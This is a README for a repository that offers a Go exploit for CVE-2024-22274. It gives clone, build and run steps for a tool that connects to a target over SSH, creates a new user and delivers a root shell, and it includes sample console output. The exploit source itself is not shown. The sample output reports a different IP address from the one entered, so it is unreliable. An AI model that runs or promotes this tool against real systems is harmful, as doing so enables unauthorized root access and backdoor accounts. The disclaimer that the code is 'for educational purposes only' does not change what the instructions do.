This repository contains an exploit for CVE-2024-22274. The exploit creates a new user on a remote machine via SSH and then provides a root shell.
- Go (Golang) installed on your machine. You can download it from here.
- A remote machine with SSH access.
-
Clone the repository:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git cd CVE-2024-22274-RCE -
Install the required packages:
go mod init cve-2024-22274 go mod tidy go get golang.org/x/crypto/ssh go get golang.org/x/term
-
Compile the Go program:
go build -o cve-2024-22274-rce main.go
-
Run the compiled program:
./cve-2024-22274-rce
-
Follow the prompts:
- Enter the host address of the target machine.
- Enter the SSH port (default is 22).
- Enter the SSH username of the target machine.
- Enter the SSH password of the target machine.
- Enter the new username you want to create.
- Enter the new password for the new user.
-
After the user is created, you will get a root shell on the target machine. You can execute commands as the new user.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit): Disclaimer This code is for educational purposes only. Use it responsibly and only on systems you have permission to test.
License This project is licensed under the MIT License - see the LICENSE file for details.